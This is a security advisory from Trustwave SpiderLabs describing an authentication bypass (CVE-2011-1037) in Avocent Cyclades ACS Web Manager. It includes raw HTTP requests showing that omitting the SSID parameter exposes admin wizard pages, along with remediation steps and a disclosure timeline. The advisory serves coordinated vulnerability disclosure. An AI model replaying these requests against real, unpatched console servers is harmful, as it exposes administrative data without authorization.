Trustwave's SpiderLabs Security Advisory TWSL2011-003:
Vulnerabilities in Avocent Cyclades ACS Web Manager

Published: March 11, 2011

Vendor: Avocent www.avocent.com
Product: Cyclades ACS Web Manager
Version affected:  ACS Prior to 3.3.0-6

Product description:
ACS advanced console servers enable IT professionals and network operations
center (NOC) personnel to perform secure, remote data center management of
IT assets from anywhere in the world utilizing a Linux operating system.
 
Credit: Martin Murfitt of Trustwave's SpiderLabs

Finding 1: ACS Web Manager Broken Authentication and Session Management
CVE: CVE-2011-1037

The session management and authentication framework on the application's
web-based console contains a systemic flaw. Information is leaked
concerning pages which should only be accessible subsequent to
authentication within anonymously available content.

The application employs a client-based security control, where attempts to
access authenticated functions without the proper session cookie are met
with a response to the 'login.asp' page, only if the variable 'SSID' is
present in the request.

The variable is returned by the application in prior pages. However, as all
client content is user controlled, removing this variable breaches the
control as the application does not validate it is not present and respond
accordingly.

An attacker can leverage this feature to breach the authentication
mechanism and access the underlying application console, revealing
functionality that should only be visible to a 'wizard' administrative
user.

Please note that dynamic content is not enabled using this technique. While
an attacker can leverage this vulnerability to access sensitive information
on the vulnerable system, that individual cannot alter any settings.

Example:
STEP 1: Request /wizard/secProfile.asp with SSID GET variable set to 0:
GET /wizard/secProfile.asp?SSID=0 HTTP/1.1
Host: XXX.XXX.XXX.XXX
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.2.10) Gecko/20100914 Firefox/3.6.10
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://XXX.XXX.XXX.XXX/wizard/main.asp

HTTP/1.1 200 Data follows
Server: XXXX
Date: Tue Oct 19 11:37:29 2010
Pragma: no-cache
Cache-Control: no-cache
Content-Type: text/html

<html><head></head><body>
<script language='JavaScript'>
top.window.location.replace('/login.asp');
</script>
</body></html>

            </frameset>
            <frame name="menuBottom" src="menuBottom.asp?SSID=0" marginwidth="0" marginheight="0" scrolling="no" frameborder="0" noresize>
            <frame name="controls" src="controls.asp?SSID=0" marginwidth="0" marginheight="0" scrolling="no" frameborder="0" noresize>
        </frameset>
        <frame name="rightBlank" src="/blank.html" marginwidth="0" marginheight="0" scrolling="no" frameborder="0" noresize>
    </frameset>
    <frame name="bottomBlank" src="/blank.html" marginwidth="0" marginheight="0" scrolling="no" frameborder="0" noresize>
</frameset>
</html></head>

<body class="bodyMain">
</body>
</html>

STEP 2: Bypass authentication by requesting the same page without SSID parameter:
GET /wizard/secProfile.asp HTTP/1.1
Host: XXX.XXX.XXX.XXX
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.2.10) Gecko/20100914 Firefox/3.6.10
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://XXX.XXX.XXX.XXX/wizard/main.asp

HTTP/1.1 200 Data follows
Server: XXXX
Date: Tue Oct 19 11:37:29 2010
Pragma: no-cache
Cache-Control: no-cache
Content-Type: text/html

<html><head></head><body>
<script language='JavaScript'>
top.window.location.replace('/login.asp');
</script> HTTP/1.0 200 OK
Date: Tue Oct 19 12:01:07 2010
Server: XXXX
Pragma: no-cache
Cache-Control: no-cache
Content-type: text/html
        
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
    <title>Untitled</title>
        <link rel="STYLESHEET" type="text/css" href="../stylesLayout.css">
        <script language="JavaScript" src="../../scripts.js" type="text/javascript"></script>
        <script type="text/javascript">

        window.name = 'XXX.XXX.XXX.XXX_0_1936';
        parent.currentPage = self;
        parent.helpPage = 'helpPages/secProfileHelp.asp';

        var target='target=' + window.name;
        var selectedBut = 'But3';
        var selectedText = 'textBut3';
        var page = 0;
        var oldSecurityProfile = ;
        var newSecurityProfile = oldSecurityProfile;
        var showWarning = 0;
        var oldHTTP = 0;
        var oldHTTPS = 0;
        var oldHTTPredirect = 0;
*truncated*        
function showSecuredInfo()
        {
                hide('document', 'no_profile');
                hide('document', 'moderate');
                hide('document', 'open');
                hide('document', 'custom');
                show('document', 'secured');
        }

        function showModerateInfo()
        {
                hide('document', 'no_profile');
                hide('document', 'secured');
                hide('document', 'open');
                hide('document', 'custom');
                show('document', 'moderate');
*truncated*


Remediation Steps:
This issue has been addressed as of version 3.3.0-6. Please refer to the
following URL in order to download the most recent version:
http://www.avocent.com/Support_Firmware/ACS/ACS_Advanced_Console_Servers.aspx

Vendor Communication Timeline:
02/07/11 - Vulnerability disclosed to vendor
03/10/11 - Patch released
03/11/11 - Advisory published

Revision History:
1.0 Initial publication

References
1. http://www.avocent.com/assets/0/2319/2343/2465/2466/6d6f70e0-88e8-4525-ae61-bcd1c45f3010.pdf


About Trustwave:
Trustwave is the leading provider of on-demand and subscription-based
information security and payment card industry compliance management
solutions to businesses and government entities throughout the world. For
organizations faced with today's challenging data security and compliance
environment, Trustwave provides a unique approach with comprehensive
solutions that include its flagship TrustKeeper compliance management
software and other proprietary security solutions. Trustwave has helped
thousands of organizations--ranging from Fortune 500 businesses and large
financial institutions to small and medium-sized retailers--manage
compliance and secure their network infrastructure, data communications and
critical information assets. Trustwave is headquartered in Chicago with
offices throughout North America, South America, Europe, Africa, China and
Australia. For more information, visit https://www.trustwave.com

About Trustwave's SpiderLabs:
SpiderLabs(R) is the advanced security team at Trustwave focused on
application security, incident response, penetration testing, physical
security and security research. The team has performed over a thousand
incident investigations, thousands of penetration tests and hundreds of
application security tests globally. In addition, the SpiderLabs Research
team provides intelligence through bleeding-edge research and proof of
concept tool development to enhance Trustwave's products and services.
https://www.trustwave.com/spiderlabs

Disclaimer:
The information provided in this advisory is provided "as is" without
warranty of any kind. Trustwave disclaims all warranties, either express or
implied, including the warranties of merchantability and fitness for a
particular purpose. In no event shall Trustwave or its suppliers be liable
for any damages whatsoever including direct, indirect, incidental,
consequential, loss of business profits or special damages, even if
Trustwave or its suppliers have been advised of the possibility of such
damages. Some states do not allow the exclusion or limitation of liability
for consequential or incidental damages so the foregoing limitation may not
apply.